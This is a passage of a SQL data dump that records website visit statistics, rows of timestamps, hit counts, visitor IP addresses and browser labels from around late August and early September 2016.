0,'66.249.76.59',''),(59698,1472619270,1,1,0,0,'38.99.82.191','other'),(59699,1472620077,1,1,0,0,'157.55.39.225','other'),(59700,1472620721,1,1,0,0,'157.55.39.208','other'),(59701,1472620814,1,1,0,0,'66.249.76.61','chrome'),(59702,1472621448,1,1,0,0,'91.196.178.68','chrome'),(59703,1472621464,1,0,1,0,'66.249.76.59',''),(59704,1472621872,1,1,0,0,'66.249.76.61','chrome'),(59705,1472622164,1,1,0,0,'91.196.178.67','firefox'),(59706,1472623152,2,2,0,0,'38.99.82.191','other'),(59707,1472623389,2,2,0,0,'38.99.82.192','other'),(59708,1472624364,1,1,0,0,'176.111.33.18','firefox'),(59709,1472624456,1,1,0,0,'66.249.93.55','chrome'),(59710,1472624810,1,0,1,0,'66.249.66.84',''),(59711,1472625268,1,1,0,0,'94.179.122.254','firefox'),(59712,1472625921,1,1,0,0,'91.196.178.65','firefox'),(59713,1472625937,1,1,0,0,'91.196.178.132','firefox'),(59714,1472626075,1,1,0,0,'207.46.13.169','other'),(59715,1472626199,1,1,0,0,'38.99.82.191','other'),(59716,1472626417,2,2,0,0,'119.147.146.189','chrome'),(59717,1472626455,1,1,0,0,'91.196.178.66','firefox'),(59718,1472626881,1,0,1,0,'66.249.76.59',''),(59719,1472627318,1,1,0,0,'91.196.177.15','chrome'),(59720,1472628393,1,1,0,0,'94.179.122.254','firefox'),(59721,1472628773,1,1,0,0,'176.111.33.18','firefox'),(59722,1472628960,1,1,0,0,'38.99.82.191','other'),(59723,1472629836,1,1,0,0,'207.46.13.169','other'),(59724,1472629907,1,0,1,0,'66.249.76.60',''),(59725,1472630016,1,0,1,0,'66.249.76.59',''),(59726,1472630475,2,2,0,0,'91.196.178.65','firefox'),(59727,1472630997,1,1,0,0,'94.179.124.74','firefox'),(59728,1472631381,1,0,1,0,'66.249.76.61',''),(59729,1472631657,1,1,0,0,'38.99.82.191','other'),(59730,1472633392,1,1,0,0,'91.196.178.68','other'),(59731,1472633818,1,1,0,0,'91.196.178.38','firefox'),(59732,1472634035,1,1,0,0,'38.99.82.191','other'),(59733,1472636292,1,1,0,0,'5.1.19.25','chrome'),(59734,1472636512,1,1,0,0,'141.8.183.25','other'),(59735,1472637417,1,1,0,0,'92.113.126.61','firefox'),(59736,1472638183,2,0,2,0,'66.249.76.60',''),(59737,1472638547,1,0,1,0,'66.249.76.61',''),(59738,1472638600,1,1,0,0,'92.113.126.61','firefox'),(59739,1472638673,1,0,1,0,'66.249.76.59',''),(59740,1472638735,1,1,0,0,'38.99.82.191','other'),(59741,1472639105,1,1,0,0,'130.180.211.134','chrome'),(59742,1472639622,1,0,1,0,'66.249.76.59',''),(59743,1472641571,1,1,0,0,'5.58.1.84','firefox'),(59744,1472641765,1,1,0,0,'92.113.126.61','firefox'),(59745,1472642044,1,1,0,0,'46.33.57.212','firefox'),(59746,1472642224,1,0,1,0,'66.249.76.59',''),(59747,1472642605,1,1,0,0,'91.196.177.15','chrome'),(59748,1472642629,1,1,0,0,'91.196.178.72','chrome'),(59749,1472642673,1,0,1,0,'66.249.66.81',''),(59750,1472642677,1,0,1,0,'66.249.76.77',''),(59751,1472642728,1,0,1,0,'66.249.76.60',''),(59752,1472643518,1,1,0,0,'94.179.123.250','firefox'),(59753,1472645594,1,1,0,0,'5.1.19.25','chrome'),(59754,1472647110,1,1,0,0,'131.228.182.249','firefox'),(59755,1472647404,1,1,0,0,'91.213.33.104','chrome'),(59756,1472647765,1,1,0,0,'94.178.89.78','chrome'),(59757,1472648309,1,1,0,0,'82.207.91.234','firefox'),(59758,1472649150,1,0,1,0,'66.249.76.79',''),(59759,1472649322,1,1,0,0,'94.179.99.168','firefox'),(59760,1472649544,1,0,1,0,'66.249.76.60',''),(59761,1472649764,1,1,0,0,'46.200.103.234','chrome'),(59762,1472650415,1,1,0,0,'91.196.178.70','firefox'),(59763,1472652007,1,1,0,0,'91.196.178.70','firefox'),(59764,1472652175,1,0,1,0,'66.249.76.60',''),(59765,1472652812,1,1,0,0,'95.135.240.125','firefox'),(59766,1472652988,1,1,0,0,'91.196.178.161','chrome'),(59767,1472654599,1,1,0,0,'92.113.126.61','firefox'),(59768,1472655915,1,0,1,0,'66.249.76.60',''),(59769,1472656059,1,1,0,0,'31.43.20.78','chrome'),(59770,1472656606,1,1,0,0,'130.193.51.19','other'),(59771,1472656610,1,1,0,0,'141.8.142.61','other'),(59772,1472658514,2,2,0,0,'51.254.129.90','other'),(59773,1472658544,1,1,0,0,'141.0.12.92','opera'),(59774,1472658995,1,0,1,0,'66.249.66.84',''),(59775,1472659420,1,1,0,0,'180.76.15.134','other'),(59776,1472659564,1,1,0,0,'5.255.250.41','other'),(59777,1472660348,1,1,0,0,'185.26.180.31','opera'),(59778,1472660416,1,0,1,0,'66.249.76.61',''),(59779,1472660479,1,0,1,0,'66.249.66.81',''),(59780,1472660480,1,1,0,0,'141.0.14.63','other'),(59781,1472660569,1,1,0,0,'92.113.126.61','firefox'),(59782,1472660872,1,1,0,0,'91.196.178.65','chrome'),(59783,1472660978,1,0,1,0,'66.249.76.59',''),(59784,1472661505,1,1,0,0,'5.9.63.149','other'),(59785,1472662109,1,1,0,0,'91.235.102.231','chrome'),(59786,1472662154,1,1,0,0,'141.8.184.6','other'),(59787,1472662455,1,1,0,0,'91.196.122.202','chrome'),(59788,1472663266,1,1,0,0,'5.45.255.111','chrome'),(59789,1472663309,1,1,0,0,'93.158.152.66','other'),(59790,1472663493,1,1,0,0,'91.196.178.162','chrome'),(59791,1472663628,1,0,1,0,'66.249.76.77',''),(59792,1472664550,1,1,0,0,'93.158.152.66','other'),(59793,1472665144,1,1,0,0,'185.26.180.117','opera'),(59794,1472665744,1,1,0,0,'92.113.126.61','firefox'),(59795,1472666266,2,0,2,0,'66.249.76.60',''),(59796,1472667191,1,1,0,0,'130.193.51.79','other'),(59797,1472667194,1,1,0,0,'141.8.142.58','other'),(59798,1472667611,1,1,0,0,'82.145.220.202','opera'),(59799,1472668826,1,1,0,0,'109.122.12.26','chrome'),(59800,1472669597,1,1,0,0,'185.26.180.72','other'),(59801,1472670666,1,0,1,0,'66.249.76.59',''),(59802,1472670837,1,1,0,0,'46.73.131.244','msie'),(59803,1472671011,1,1,0,0,'89.21.77.100','chrome'),(59804,1472672016,1,1,0,0,'194.44.41.70','firefox'),(59805,1472672943,1,1,0,0,'92.113.126.61','firefox'),(59806,1472672957,1,1,0,0,'89.21.77.100','chrome'),(59807,1472674296,1,0,1,0,'66.249.76.60',''),(59808,1472674472,1,0,1,0,'66.249.76.79',''),(59809,1472674628,1,1,0,0,'213.179.252.251','chrome'),(59810,1472675220,1,1,0,0,'188.32.135.141','msie'),(59811,1472676207,1,0,1,0,'66.249.66.84',''),(59812,1472676268,1,1,0,0,'78.154.191.64','chrome'),(59813,1472676444,1,1,0,0,'176.193.177.31','msie'),(59814,1472676881,1,1,0,0,'178.93.206.20','firefox'),(59815,1472677710,1,1,0,0,'213.179.252.251','chrome'),(59816,1472677868,1,1,0,0,'130.193.51.19','other'),(59817,1472679484,11,11,0,0,'144.76.12.75','other'),(59818,1472682751,1,1,0,0,'130.193.50.34','other'),(59819,1472683522,1,1,0,0,'157.55.39.208','other'),(59820,1472684632,1,1,0,0,'51.255.66.125','other'),(59821,1472685023,4,4,0,0,'188.40.95.70','other'),(59822,1472686072,1,1,0,0,'207.46.13.95','other'),(59823,1472686166,1,1,0,0,'5.255.250.41','other'),(59824,1472686683,1,0,1,0,'66.249.76.59',''),(59825,1472687816,1,1,0,0,'130.193.50.34','other'),(59826,1472695859,4,4,0,0,'212.47.241.21','other'),(59827,1472696085,1,1,0,0,'130.193.50.34','other'),(59828,1472696182,1,1,0,0,'66.249.76.61','chrome'),(59829,1472696674,1,1,0,0,'207.46.13.169','other'),(59830,1472697394,6,6,0,0,'141.95.0.54','other'),(59831,1472698024,1,0,1,0,'66.249.76.60',''),(59832,1472699114,2,2,0,0,'130.193.50.34','other'),(59833,1472699559,1,1,0,0,'141.8.183.25','other'),(59834,1472700540,1,1,0,0,'92.113.126.61','firefox'),(59835,1472700860,1,1,0,0,'91.196.178.33','chrome'),(59836,1472701251,1,1,0,0,'180.76.15.22','other'),(59837,1472701437,1,1,0,0,'144.76.8.132','other'),(59838,1472701447,1,0,1,0,'68.180.230.222',''),(59839,1472703562,2,0,2,0,'66.249.76.59',''),(59840,1472704829,1,0,1,0,'66.249.76.60',''),(59841,1472705220,1,1,0,0,'207.46.13.169','other'),(59842,1472706960,4,4,0,0,'51.254.32.67','other'),(59843,1472707216,1,1,0,0,'91.196.178.67','firefox'),(59844,1472707383,1,0,1,0,'66.249.76.59',''),(59845,1472708359,1,1,0,0,'66.102.9.113','chrome'),(59846,1472708650,1,1,0,0,'91.196.178.67','firefox'),(59847,1472708690,1,1,0,0,'207.46.13.169','other'),(59848,1472709503,1,1,0,0,'92.113.126.61','firefox'),(59849,1472709590,1,1,0,0,'141.0.13.163','opera'),(59850,1472709880,1,1,0,0,'195.211.230.2','chrome'),(59851,1472710790,1,1,0,0,'92.113.10.220','firefox'),(59852,1472711548,1,0,1,0,'66.249.66.81',''),(59853,1472711602,4,4,0,0,'5.9.151.22','other'),(59854,1472711673,1,1,0,0,'91.196.178.67','firefox'),(59855,1472712029,1,1,0,0,'207.46.13.169','other'),(59856,1472714083,2,2,0,0,'38.99.82.192','other'),(59857,1472714146,2,2,0,0,'38.99.82.191','other'),(59858,1472715746,1,1,0,0,'66.249.76.59','chrome'),(59859,1472716983,1,1,0,0,'207.46.13.169','other'),(59860,1472717600,1,1,0,0,'185.26.180.192','opera'),(59861,1472717653,1,1,0,0,'38.99.82.192','other'),(59862,1472718360,1,1,0,0,'91.196.178.70','firefox'),(59863,1472718826,1,1,0,0,'66.249.76.60','chrome'),(59864,1472718967,1,1,0,0,'66.249.76.79','chrome'),(59865,1472719585,1,1,0,0,'157.55.39.208','other'),(59866,1472719737,1,1,0,0,'91.196.178.70','firefox'),(59867,1472720682,1,1,0,0,'95.132.140.206','chrome'),(59868,1472720699,1,1,0,0,'141.8.183.25','other'),(59869,1472720909,1,1,0,0,'91.196.178.67','chrome'),(59870,1472721697,2,2,0,0,'130.193.50.34','other'),(59871,1472722231,1,1,0,0,'141.8.132.2','other'),(59872,1472722330,1,1,0,0,'38.99.82.191','other'),(59873,1472723089,1,1,0,0,'37.53.122.15','chrome'),(59874,1472723117,1,1,0,0,'92.113.56.80','firefox'),(59875,1472724247,1,1,0,0,'82.145.223.56','opera'),(59876,1472725144,1,1,0,0,'92.113.126.61','firefox'),(59877,1472725921,2,2,0,0,'178.92.191.226','chrome'),(59878,1472725934,1,1,0,0,'38.99.82.191','other'),(59879,1472726223,1,1,0,0,'92.113.126.61','firefox'),(59880,1472726382,1,1,0,0,'207.46.13.169','other'),(59881,1472726471,1,1,0,0,'37.73.216.60','chrome'),(59882,1472726706,1,1,0,0,'91.196.178.70','chrome'),(59883,1472726744,1,1,0,0,'207.46.13.95','other'),(59884,1472726835,1,1,0,0,'23.101.61.176','other'),(59885,1472726972,1,1,0,0,'141.0.12.178','opera'),(59886,1472726999,1,1,0,0,'31.13.102.105','other'),(59887,1472727008,1,1,0,0,'31.13.109.116','other'),(59888,1472727125,1,1,0,0,'92.113.126.61','firefox'),(59889,1472727475,1,1,0,0,'91.196.178.67','firefox'),(59890,1472727495,1,1,0,0,'193.19.152.14','other'),(59891,1472727774,1,1,0,0,'207.46.13.41','other'),(59892,1472728192,1,1,0,0,'37.73.252.24','chrome'),(59893,1472728591,1,0,1,0,'66.249.76.61',''),(59894,1472728600,1,1,0,0,'91.196.178.72','chrome'),(59895,1472728956,1,1,0,0,'91.196.178.72','firefox'),(59896,1472729021,1,1,0,0,'91.196.178.65','firefox'),(59897,1472729388,1,1,0,0,'38.99.82.192','other'),(59898,1472729683,1,1,0,0,'91.196.178.65','chrome'),(59899,1472730098,1,1,0,0,'46.211.71.117','chrome'),(59900,1472730394,1,1,0,0,'91.196.178.67','firefox'),(59901,1472730509,1,1,0,0,'37.54.21.35','chrome'),(59902,1472730579,1,0,1,0,'66.249.76.61',''),(59903,1472730661,1,1,0,0,'92.113.126.61','firefox'),(59904,1472730884,1,1,0,0,'141.0.12.33','opera'),(59905,1472731438,2,2,0,0,'91.196.178.65','chrome'),(59906,1472731921,1,1,0,0,'92.113.126.61','firefox'),(59907,1472732460,1,1,0,0,'94.179.21.89','firefox'),(59908,1472732592,1,1,0,0,'37.53.241.216','firefox'),(59909,1472732911,3,3,0,0,'141.8.183.25','other'),(59910,1472733114,1,1,0,0,'130.193.50.34','other'),(59911,1472733276,1,1,0,0,'130.193.51.19','other'),(59912,1472733501,1,1,0,0,'91.196.178.65','chrome'),(59913,1472733966,1,0,1,0,'66.249.66.81',''),(59914,1472734099,1,1,0,0,'207.46.13.169','other'),(59915,1472734174,1,1,0,0,'37.53.171.112','firefox'),(59916,1472735055,1,1,0,0,'38.99.82.191','other'),(59917,1472735134,1,1,0,0,'38.99.82.192','other'),(59918,1472735861,1,1,0,0,'92.113.126.61','firefox'),(59919,1472736029,1,1,0,0,'37.53.89.22','chrome'),(59920,1472736313,1,1,0,0,'91.196.178.102','firefox'),(59921,1472736497,1,1,0,0,'91.196.179.33','chrome'),(59922,1472737069,1,1,0,0,'91.196.178.72','firefox'),(59923,1472737461,1,1,0,0,'93.75.2.233','firefox'),(59924,1472737562,1,1,0,0,'130.193.50.6','other'),(59926,1472739077,1,1,0,0,'91.196.178.65','chrome'),(59927,1472740029,1,1,0,0,'91.196.178.67','firefox'),(59928,1472740709,1,1,0,0,'66.249.93.57','chrome'),(59929,1472740951,1,1,0,0,'38.99.82.191','other'),(59930,1472741087,1,1,0,0,'91.196.178.103','chrome'),(59931,1472742095,1,0,1,0,'68.180.230.178',''),(59932,1472743100,1,1,0,0,'92.113.126.61','firefox'),(59933,1472743830,1,1,0,0,'38.99.82.192','other'),(59934,1472743833,1,1,0,0,'38.99.82.191','other'),(59935,1472744102,1,1,0,0,'91.196.178.103','chrome'),(59936,1472744407,1,1,0,0,'37.73.203.34','chrome'),(59937,1472746476,1,1,0,0,'207.46.13.95','other'),(59938,1472746482,1,1,0,0,'46.211.4.85','chrome'),(59939,1472746602,1,1,0,0,'141.0.12.72','other'),(59940,1472746603,1,1,0,0,'178.93.151.226','firefox'),(59941,1472746934,1,1,0,0,'38.99.82.191','other'),(59942,1472747397,1,1,0,0,'130.193.51.19','other'),(59944,1472747974,3,3,0,0,'178.93.151.226','firefox'),(59945,1472748016,1,1,0,0,'130.193.50.34','other'),(59946,1472748017,1,1,0,0,'141.8.183.25','other'),(59947,1472749331,1,1,0,0,'141.8.183.25','other'),(59949,1472750039,1,1,0,0,'130.193.50.34','other'),(59950,1472750231,1,1,0,0,'82.145.210.29','other'),(59951,1472751019,1,1,0,0,'180.76.15.147','other'),(59952,1472751314,1,0,1,0,'66.249.76.61',''),(59953,1472751630,1,1,0,0,'38.99.82.192','other'),(59954,1472751637,2,2,0,0,'38.99.82.191','other'),(59955,1472752230,1,0,1,0,'66.249.76.60',''),(59956,1472752398,1,1,0,0,'37.73.171.129','chrome'),(59957,1472752690,1,1,0,0,'130.193.51.19','other'),(59958,1472753404,1,1,0,0,'92.113.126.61','firefox'),(59959,1472753435,1,1,0,0,'91.196.178.132','chrome'),(59960,1472753544,1,1,0,0,'207.46.13.169','other'),(59961,1472753668,1,1,0,0,'193.194.127.217','firefox'),(59962,1472754957,1,1,0,0,'82.145.222.54','opera'),(59963,1472755308,1,1,0,0,'46.211.69.160','chrome'),(59964,1472755856,1,1,0,0,'38.99.82.191','other'),(59965,1472756191,1,1,0,0,'185.26.180.70','other'),(59966,1472756974,1,1,0,0,'46.211.141.82','chrome'),(59967,1472757918,1,1,0,0,'82.145.223.55','opera'),(59968,1472758809,1,1,0,0,'92.113.126.61','firefox'),(59969,1472759604,1,1,0,0,'91.196.178.69','chrome'),(59970,1472761226,1,1,0,0,'37.54.115.155','chrome'),(59971,1472761813,1,1,0,0,'92.113.126.61','firefox'),(59972,1472761833,1,1,0,0,'38.99.82.193','other'),(59973,1472762146,1,1,0,0,'141.8.142.58','other'),(59974,1472762688,1,1,0,0,'207.46.13.169','other'),(59975,1472763289,1,0,1,0,'66.249.66.81',''),(59976,1472765502,1,1,0,0,'92.113.126.61','firefox'),(59977,1472766441,1,1,0,0,'38.99.82.192','other'),(59978,1472766510,1,1,0,0,'5.255.250.41','other'),(59979,1472769254,129,129,0,0,'46.4.120.3','other'),(59980,1472769345,1,1,0,0,'199.58.86.211','other'),(59981,1472770874,2,2,0,0,'38.99.82.192','other'),(59982,1472773656,1,1,0,0,'38.99.82.191','other'),(59983,1472776218,1,1,0,0,'207.46.13.169','other'),(59984,1472776663,1,1,0,0,'38.99.82.192','other'),(59985,1472778165,1,1,0,0,'207.46.13.95','other'),(59986,1472778694,1,1,0,0,'66.249.66.81','chrome'),(59987,1472779174,2,2,0,0,'66.249.66.84','chrome'),(59988,1472780092,1,1,0,0,'141.8.142.58','other'),(59989,1472780212,1,1,0,0,'130.193.51.19','other'),(59990,1472780296,1,1,0,0,'93.158.152.84','other'),(59991,1472780878,1,1,0,0,'38.99.82.192','other'),(59992,1472781818,1,1,0,0,'180.76.15.159','other'),(59993,1472783999,1,1,0,0,'188.227.19.62','msie'),(59994,1472785182,1,1,0,0,'82.145.220.95','other'),(59995,1472785511,1,1,0,0,'207.46.13.169','other'),(59996,1472787215,1,1,0,0,'207.46.13.169','other'),(59997,1472787811,1,1,0,0,'38.99.82.192','other'),(59998,1472788423,2,2,0,0,'130.193.50.34','other'),(59999,1472788707,1,1,0,0,'141.8.183.25','other'),(60000,1472788761,1,0,1,0,'68.180.230.178',''),(60001,1472789449,1,1,0,0,'93.158.152.84','other'),(60002,1472789931,3,3,0,0,'38.99.82.192','other'),(60003,1472789942,1,1,0,0,'38.99.82.191','other'),(60004,1472791978,1,1,0,0,'141.0.13.66','opera'),(60005,1472792425,1,1,0,0,'38.99.82.191','other'),(60006,1472792602,1,1,0,0,'93.158.152.61','other'),(60007,1472792606,1,1,0,0,'130.193.50.38','other'),(60008,1472793638,1,1,0,0,'40.77.167.80','other'),(60009,1472793682,1,1,0,0,'92.113.126.61','firefox'),(60010,1472794172,1,1,0,0,'66.249.76.59','chrome'),(60011,1472794641,1,1,0,0,'37.53.241.88','firefox'),(60012,1472794988,2,2,0,0,'91.196.178.68','chrome'),(60013,1472795103,1,1,0,0,'66.249.76.61','chrome'),(60014,1472795194,1,1,0,0,'38.99.82.192','other'),(60015,1472795455,1,1,0,0,'91.196.178.67','firefox'),(60016,1472795565,1,1,0,0,'91.196.178.99','chrome'),(60017,1472795876,1,1,0,0,'66.249.66.84','chrome'),(60018,1472795970,1,1,0,0,'82.145.222.101','opera'),(60019,1472796831,1,1,0,0,'95.133.34.137','firefox'),(60020,1472797446,1,1,0,0,'91.196.178.68','chrome'),(60021,1472798060,1,1,0,0,'81.30.160.98','other'),(60022,1472798365,1,1,0,0,'38.99.82.192','other'),(60023,1472799287,1,1,0,0,'82.145.221.236','opera'),(60024,1472799604,1,0,1,0,'66.249.76.59',''),(60025,1472800988,2,2,0,0,'91.196.178.65','firefox'),(60026,1472801177,1,1,0,0,'91.196.178.71','firefox'),(60027,1472801721,1,1,0,0,'38.99.82.191','other'),(60028,1472802297,1,1,0,0,'31.41.70.13','opera'),(60029,1472802923,1,1,0,0,'94.179.54.99','firefox'),(60030,1472803665,1,1,0,0,'174.129.237.157','other'),(60031,1472803907,1,1,0,0,'38.99.82.192','other'),(60032,1472804204,1,1,0,0,'178.93.162.8','chrome'),(60033,1472804932,1,1,0,0,'91.204.87.130','chrome'),(60034,1472806152,1,1,0,0,'141.0.12.191','opera'),(60035,1472806425,1,1,0,0,'92.113.126.61','firefox'),(60036,1472806699,1,1,0,0,'38.99.82.191','other'),(60037,1472806994,1,1,0,0,'180.76.15.158','other'),(60038,1472808345,1,1,0,0,'37.53.255.200','chrome'),(60039,1472809166,2,2,0,0,'38.99.82.191','other'),(60040,1472809203,2,2,0,0,'38.99.82.192','other'),(60041,1472809303,2,2,0,0,'69.30.198.202','other'),(60042,1472809961,1,1,0,0,'66.249.76.60','chrome'),(60043,1472810041,1,1,0,0,'66.249.76.79','chrome'),(60044,1472810401,1,1,0,0,'38.99.82.191','other'),(60045,1472813542,1,1,0,0,'38.99.82.191','other'),(60046,1472813770,1,1,0,0,'95.132.19.60','firefox'),(60047,1472814402,1,1,0,0,'46.211.145.70','chrome'),(60048,1472815554,13,13,0,0,'51.254.32.63','other'),(60049,1472815811,1,1,0,0,'207.46.13.169','other'),(60050,1472816764,1,1,0,0,'38.99.82.191','other'),(60051,1472818250,1,1,0,0,'207.46.13.169','other'),(60052,1472819276,1,1,0,0,'37.55.63.0','chrome'),(60053,1472820241,1,1,0,0,'95.134.96.90','chrome'),(60054,1472820250,1,1,0,0,'37.54.21.35','chrome'),(60055,1472820306,1,1,0,0,'91.196.178.67','firefox'),(60056,1472820681,1,1,0,0,'92.113.126.61','firefox'),(60057,1472821437,1,1,0,0,'40.77.167.104','other'),(60058,1472821609,1,1,0,0,'178.93.18.199','firefox'),(60059,1472821635,1,1,0,0,'130.193.50.34','other'),(60060,1472822178,1,0,1,0,'66.249.76.61',''),(60061,1472822501,1,1,0,0,'51.255.66.125','other'),(60062,1472822574,1,1,0,0,'38.99.82.191','other'),(60063,1472824100,1,1,0,0,'141.8.132.10','other'),(60064,1472824101,1,1,0,0,'141.8.142.67','other'),(60065,1472824326,1,1,0,0,'180.76.15.26','other'),(60066,1472826499,1,1,0,0,'46.133.83.109','chrome'),(60067,1472826527,1,1,0,0,'5.255.250.41','other'),(60068,1472827476,1,1,0,0,'185.76.71.68','chrome'),(60069,1472828445,4,4,0,0,'38.99.82.191','other'),(60070,1472828463,1,1,0,0,'37.54.115.30','firefox'),(60071,1472828681,1,1,0,0,'207.46.13.169','other'),(60072,1472829010,1,1,0,0,'141.0.12.82','opera'),(60073,1472829449,1,1,0,0,'130.193.51.19','other'),(60074,1472830689,1,1,0,0,'195.230.140.230','chrome'),(60075,1472830992,1,1,0,0,'180.76.15.19','other'),(60076,1472831878,1,1,0,0,'141.0.14.172','other'),(60077,1472833217,1,1,0,0,'38.99.82.191','other'),(60078,1472833730,1,1,0,0,'141.8.142.58','other'),(60079,1472835383,1,1,0,0,'141.8.183.25','other'),(60080,1472835728,1,1,0,0,'40.77.167.80','other'),(60081,1472836411,1,1,0,0,'38.99.82.191','other'),(60082,1472836462,1,0,1,0,'66.249.76.61',''),(60083,1472836931,1,1,0,0,'5.255.250.41','other'),(60084,1472837091,1,1,0,0,'130.193.51.19','other'),(60085,1472838643,1,1,0,0,'91.196.178.163','other'),(60086,1472839901,1,1,0,0,'141.0.13.149','other'),(60087,1472840226,1,1,0,0,'141.8.183.25','other'),(60088,1472841077,1,0,1,0,'66.249.66.183',''),(60089,1472841086,1,0,1,0,'66.249.66.81',''),(60090,1472841271,2,2,0,0,'144.76.12.75','other'),(60091,1472842079,1,1,0,0,'38.99.82.191','other'),(60092,1472844405,1,1,0,0,'38.99.82.191','other'),(60093,1472846186,1,1,0,0,'91.196.178.104','firefox'),(60094,1472846761,3,3,0,0,'178.137.87.242','chrome'),(60095,1472848224,1,1,0,0,'38.99.82.192','other'),(60096,1472848444,1,1,0,0,'128.68.11.64','chrome'),(60097,1472848445,1,1,0,0,'176.195.102.99','chrome'),(60098,1472848446,1,1,0,0,'37.112.233.97','opera'),(60099,1472848447,1,1,0,0,'178.140.184.235','msie'),(60100,1472848458,1,1,0,0,'46.251.80.174','chrome'),(60101,1472849076,1,1,0,0,'5.9.73.227','other'),(60102,1472850453,1,1,0,0,'91.196.178.97','chrome'),(60103,1472852982,1,0,1,0,'66.249.76.61',''),(60104,1472853279,1,0,1,0,'68.180.230.178',''),(60105,1472854694,1,1,0,0,'38.99.82.191','other'),(60106,1472855436,1,0,1,0,'66.249.76.81',''),(60107,1472856726,1,1,0,0,'130.193.50.34','other'),(60108,1472856775,1,1,0,0,'141.8.183.25','other'),(60109,1472857131,1,1,0,0,'40.77.167.104','other'),(60110,1472859190,1,1,0,0,'66.249.93.55','chrome'),(60111,1472859213,1,1,0,0,'8.29.198.41','other'),(60112,1472859214,1,1,0,0,'91.196.178.101','chrome'),(60113,1472859215,1,1,0,0,'66.102.9.93','chrome'),(60114,1472859216,1,1,0,0,'66.102.9.103','chrome'),(60115,1472859220,1,1,0,0,'91.196.178.101','other'),(60116,1472860986,1,1,0,0,'66.249.81.205','other'),(60117,1472861183,1,1,0,0,'40.77.167.80','other'),(60118,1472862738,2,0,2,0,'66.249.76.59',''),(60119,1472864393,1,1,0,0,'66.249.81.202','other'),(60120,1472866583,3,3,0,0,'38.99.82.191','other'),(60121,1472866604,1,1,0,0,'38.99.82.192','other'),(60122,1472867256,8,8,0,0,'51.254.130.58','other'),(60123,1472867840,1,0,1,0,'66.249.76.81',''),(60124,1472868193,1,1,0,0,'66.249.81.208','other'),(60125,1472869113,1,1,0,0,'38.99.82.192','other'),(60126,1472869891,1,1,0,0,'82.145.221.245','other'),(60127,1472870147,4,4,0,0,'5.9.123.116','other'),(60128,1472871579,1,1,0,0,'185.76.71.68','chrome'),(60129,1472871768,1,1,0,0,'180.76.15.23','other'),(60130,1472871827,1,1,0,0,'66.249.81.202','other'),(60131,1472872420,1,0,1,0,'66.249.76.59',''),(60132,1472873571,1,1,0,0,'130.193.50.34','other'),(60133,1472873653,1,1,0,0,'40.77.167.80','other'),(60134,1472873934,10,10,0,0,'108.59.8.70','other'),(60135,1472875787,1,1,0,0,'180.76.15.144','other'),(60136,1472878025,2,2,0,0,'40.77.167.80','other'),(60137,1472878945,1,0,1,0,'66.249.76.59',''),(60138,1472879217,1,0,1,0,'66.249.76.60',''),(60139,1472879602,1,1,0,0,'207.46.13.167','other'),(60140,1472882042,4,4,0,0,'151.80.44.115','other'),(60141,1472883127,1,1,0,0,'38.99.82.192','other'),(60142,1472883857,6,0,6,0,'68.180.230.222',''),(60143,1472884552,1,1,0,0,'40.77.167.80','other'),(60144,1472885191,1,1,0,0,'38.99.82.191','other'),(60145,1472885208,3,3,0,0,'38.99.82.193','other'),(60146,1472885225,2,0,2,0,'68.180.230.222',''),(60147,1472886013,1,1,0,0,'66.249.93.59','chrome'),(60148,1472886434,1,1,0,0,'38.99.82.193','other'),(60149,1472888066,1,1,0,0,'141.0.13.29','opera'),(60150,1472888646,1,1,0,0,'66.249.93.57','chrome'),(60151,1472889649,1,0,1,0,'66.249.76.61',''),(60152,1472889655,1,0,1,0,'66.249.76.59',''),(60153,1472889911,1,1,0,0,'66.249.81.202','other'),(60154,1472891514,1,1,0,0,'38.99.82.193','other'),(60155,1472892412,1,0,1,0,'68.180.230.222',''),(60156,1472893201,1,1,0,0,'79.137.181.251','other'),(60157,1472893416,1,1,0,0,'66.249.81.202','other'),(60158,1472895641,1,0,1,0,'68.180.230.222',''),(60159,1472896997,1,1,0,0,'66.249.81.205','other'),(60160,1472897224,2,2,0,0,'141.8.183.25','other'),(60161,1472897301,1,1,0,0,'38.99.82.192','other'),(60162,1472897303,1,1,0,0,'38.99.82.191','other'),(60163,1472897830,1,1,0,0,'78.111.186.47','chrome'),(60164,1472898768,1,1,0,0,'141.8.142.58','other'),(60165,1472899135,1,1,0,0,'130.193.51.19','other'),(60166,1472899515,1,1,0,0,'38.99.82.192','other'),(60167,1472900597,1,1,0,0,'66.249.81.205','other'),(60168,1472901186,1,1,0,0,'38.99.82.191','other'),(60169,1472901495,2,2,0,0,'38.99.82.193','other'),(60170,1472901498,2,2,0,0,'38.99.82.192','other'),(60171,1472901662,1,1,0,0,'188.163.72.20','chrome'),(60172,1472901678,1,1,0,0,'207.46.13.167','other'),(60173,1472903924,2,2,0,0,'69.30.198.178','other'),(60174,1472904212,1,1,0,0,'66.249.81.208','other'),(60175,1472904620,1,1,0,0,'207.46.13.111','other'),(60176,1472905222,1,1,0,0,'180.76.15.10','other'),(60177,1472906477,1,1,0,0,'141.8.183.25','other'),(60178,1472906606,1,1,0,0,'130.193.50.34','other'),(60179,1472907805,1,1,0,0,'66.249.81.208','other'),(60180,1472910507,1,1,0,0,'66.249.76.60','chrome'),(60181,1472910551,1,1,0,0,'66.249.76.79','chrome'),(60182,1472911432,1,1,0,0,'66.249.81.205','other'),(60183,1472911570,1,1,0,0,'130.193.51.19','other'),(60184,1472911701,1,1,0,0,'94.179.56.100','firefox'),(60185,1472911748,1,1,0,0,'141.8.183.25','other'),(60186,1472911756,1,1,0,0,'93.158.152.84','other'),(60187,1472912330,1,1,0,0,'141.8.142.58','other'),(60188,1472914643,1,1,0,0,'141.8.142.58','other'),(60189,1472914831,1,1,0,0,'66.102.9.93','chrome'),(60190,1472915015,1,1,0,0,'66.249.81.205','other'),(60191,1472917130,1,1,0,0,'37.54.115.155','chrome'),(60192,1472918640,1,1,0,0,'66.249.81.205','other'),(60193,1472918715,1,1,0,0,'180.76.15.33','other'),(60194,1472919945,1,1,0,0,'141.8.142.58','other'),(60195,1472921613,1,1,0,0,'109.227.93.45','chrome'),(60196,1472922242,1,1,0,0,'66.249.81.208','other'),(60197,1472922696,1,1,0,0,'130.193.51.19','other'),(60198,1472923053,1,1,0,0,'37.54.115.30','firefox'),(60199,1472924553,1,1,0,0,'141.0.13.133','other'),(60200,1472925796,1,1,0,0,'66.249.81.202','other'),(60201,1472925938,1,1,0,0,'130.193.51.19','other'),(60202,1472927185,2,2,0,0,'130.193.51.19','other'),(60203,1472927221,2,2,0,0,'130.193.50.34','other'),(60204,1472928551,1,1,0,0,'207.46.13.167','other'),(60205,1472929502,1,1,0,0,'66.249.81.205','other'),(60206,1472930200,1,1,0,0,'180.76.